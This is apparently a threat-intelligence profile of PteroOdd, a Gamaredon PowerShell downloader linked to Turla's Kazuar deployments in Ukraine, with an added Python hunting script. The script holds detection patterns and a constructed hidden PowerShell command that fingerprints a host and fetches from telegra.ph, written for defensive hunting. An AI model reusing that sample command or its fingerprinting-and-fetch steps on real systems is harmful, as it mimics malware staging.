PteroOdd
PteroOdd is a Gamaredon malware family that ESET describes as one of several lightweight PowerShell-based downloaders added to the group's toolkit in 2025. Its role is to fetch next-stage payloads, command-and-control information, or additional malware. Reporting ties it to Gamaredon operations against Ukrainian entities, particularly government, military, and defense-related organizations. Gamaredon's known initial-access methods are spear-phishing and malicious LNK files spread on removable drives, so those are the likely vectors in its broader campaigns, but the specific initial vector for the incidents cited below was not confirmed.
High-confidence reporting states that PteroOdd was used in incidents observed between February and June 2025 in which Gamaredon facilitated deployment of Turla’s Kazuar backdoor on compromised Ukrainian systems. In one documented chain, Gamaredon deployed PteroGraphin, which downloaded PteroOdd; PteroOdd then retrieved a payload from Telegraph to execute Kazuar. ESET also reported that PteroOdd and PteroPaste were used to deploy Kazuar v2 installers in April and June 2025, and that PteroOdd was present in cases where Gamaredon tooling appeared to help recover or restart Turla’s Kazuar access. This activity has been cited as technical evidence of operational collaboration between the Russia-aligned groups Gamaredon and Turla, with Gamaredon providing or maintaining access and Turla deploying the more advanced espionage implant.
Observed indicators and behaviors directly mentioned in the cited reporting include retrieval of payloads from Telegraph, contact with the domain eset.ydns[.]eu in at least one related sample, and use in chains where victim system information (computer name, system drive volume serial number, and installed .NET versions) was collected before or alongside Kazuar deployment. PteroOdd belongs to Gamaredon's broader Ptero* toolset and is consistently characterized as a simple downloader rather than a full-featured backdoor.
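The behaviors above (a PowerShell process that fingerprints the host and then reaches Telegraph or eset.ydns[.]eu) are enough to build a first hunt. The script below is an added example written for this page; it is not code from ESET, Mallory, or the Gamaredon toolset. It assumes Sysmon-like process-create and DNS records with field names chosen here, assumes telegra.ph is the Telegraph host the downloader fetched from, and uses generic PowerShell ways of reading the computer name, volume serial and .NET versions as fingerprinting markers, since the page does not publish PteroOdd's actual command lines. The sample telemetry is constructed.

```python
"""Hunt for PteroOdd-like PowerShell downloader activity in endpoint telemetry.

Added example for this page; it is not ESET's, Gamaredon's or Mallory's code.
Assumptions: events are Sysmon-like records (field names chosen here), the
Telegraph domain is telegra.ph, and the fingerprinting patterns are generic
PowerShell ways of reading the values the reporting names, not PteroOdd's
actual command lines, which the page does not publish.
"""
import base64
import re
from collections import defaultdict

# Domains named in the reporting: eset.ydns[.]eu refanged, plus telegra.ph
# (assumed to be the "Telegraph" host the downloader fetched payloads from).
SUSPECT_DOMAINS = {"telegra.ph", "eset.ydns.eu"}

# Generic command-line markers for the three host details the reporting says
# were collected: computer name, system drive volume serial, .NET versions.
FINGERPRINT_PATTERNS = {
    "computer_name": re.compile(r"\$env:COMPUTERNAME|\bhostname\b", re.I),
    "volume_serial": re.compile(r"VolumeSerialNumber|Win32_LogicalDisk", re.I),
    "dotnet_versions": re.compile(r"NET Framework Setup\\NDP|Microsoft\.NETCore", re.I),
}
POWERSHELL_IMAGE = re.compile(r"(^|\\)(powershell|pwsh)\.exe$", re.I)
# -e / -ec / -enc / -EncodedCommand take base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def expand_command_line(cmd):
    """Append the decoded -EncodedCommand payload, if any, so the regexes see it."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + "\n" + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd  # not valid base64/UTF-16LE: fall back to the raw line


def fingerprint_hits(cmd):
    """Names of the fingerprint categories present in a (decoded) command line."""
    text = expand_command_line(cmd)
    return sorted(name for name, pat in FINGERPRINT_PATTERNS.items() if pat.search(text))


def is_suspect_domain(query):
    q = query.lower().rstrip(".")
    return q in SUSPECT_DOMAINS or any(q.endswith("." + d) for d in SUSPECT_DOMAINS)


def hunt(events):
    """Correlate process-create (eid 1) and DNS (eid 22) records per pid.

    Returns {pid: {"score", "domains", "fingerprint"}} for PowerShell processes
    that resolved suspect infrastructure and/or ran fingerprinting commands.
    """
    by_pid = defaultdict(lambda: {"image": None, "fingerprint": [], "domains": set()})
    for ev in events:
        rec = by_pid[ev["pid"]]
        if ev["eid"] == 1:
            rec["image"] = ev["image"]
            rec["fingerprint"] = fingerprint_hits(ev["cmd"])
        elif ev["eid"] == 22 and is_suspect_domain(ev["query"]):
            rec["domains"].add(ev["query"].lower().rstrip("."))
    findings = {}
    for pid, rec in by_pid.items():
        if not (rec["image"] and POWERSHELL_IMAGE.search(rec["image"])):
            continue  # a browser resolving telegra.ph is not this pattern
        score = 2 * len(rec["domains"]) + len(rec["fingerprint"])
        if score:
            findings[pid] = {"score": score, "domains": sorted(rec["domains"]),
                             "fingerprint": rec["fingerprint"]}
    return findings


# Constructed sample telemetry (not real logs). pid 4120 fingerprints the host
# and resolves both domains; pid 5001 hides the same lookup behind -enc;
# pid 6002 is a browser visiting telegra.ph; pid 7003 is benign PowerShell.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode("$env:COMPUTERNAME".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"eid": 1, "pid": 4120, "image": PS_EXE, "cmd": r"powershell.exe -w hidden -nop -c "
     r"$n=$env:COMPUTERNAME; $s=(Get-CimInstance Win32_LogicalDisk -Filter \"DeviceID='C:'\").VolumeSerialNumber; "
     r"$v=Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'; Invoke-WebRequest https://telegra.ph/x"},
    {"eid": 22, "pid": 4120, "query": "telegra.ph"},
    {"eid": 22, "pid": 4120, "query": "eset.ydns.eu"},
    {"eid": 1, "pid": 5001, "image": PS_EXE, "cmd": "powershell.exe -nop -w hidden -enc " + _ENCODED},
    {"eid": 1, "pid": 6002, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmd": "chrome.exe"},
    {"eid": 22, "pid": 6002, "query": "telegra.ph"},
    {"eid": 1, "pid": 7003, "image": PS_EXE, "cmd": "powershell.exe -c Get-Date"},
    {"eid": 22, "pid": 7003, "query": "update.microsoft.com"},
]

if __name__ == "__main__":
    for pid, f in sorted(hunt(SAMPLE_EVENTS).items()):
        print(pid, f)
```

Two caveats for running this against real telemetry: Gamaredon's PowerShell stages are commonly delivered encoded, so decoding -EncodedCommand before matching (as above) matters more than the exact regexes, and Telegraph is a legitimate publishing service, which is why the DNS hit alone is only weighted, not treated as a verdict, and why non-PowerShell processes are filtered out.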
Groups observed using it
Public researchers associate two distinct threat actors, Gamaredon and Turla, with this family.
The other five new tools - PteroDee, PteroCache, PteroDum, PteroOdd and PteroEffigy - are all lightweight downloaders that fetch the next payload, C2 information or additional malware.
The researchers first spotted in February four systems infected with a Turla backdoor called Kazuar, which attackers appeared to recover or restart ... by using malware tools Gamaredon installed on the system, including PteroGraphin and PteroOdd. The researchers later identified three more systems on which Gamaredon tools PteroOdd and PteroPaste deployed Kazuar v2, in April and June.
Techniques & procedures
4 distinct techniques are documented for this family, organized by ATT&CK tactic. The tactics with listed techniques are:
Initial Access: 1 technique
Execution: 2 techniques
IOCs tracked for this family
1 indicator, in the category of IPs, domains, and DNS infrastructure, is attributed to this family across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
9 sources are tracked across advisories, community write-ups, and news.
A lightweight downloader used to fetch next-stage payloads, command-and-control information, or additional malware.
Gamaredon tooling used to deploy Turla's Kazuar backdoor and support access restoration on compromised systems.
Custom malware family attributed (in the cited reporting) to Gamaredon; described here as being used to deploy another malware payload (Kazuar).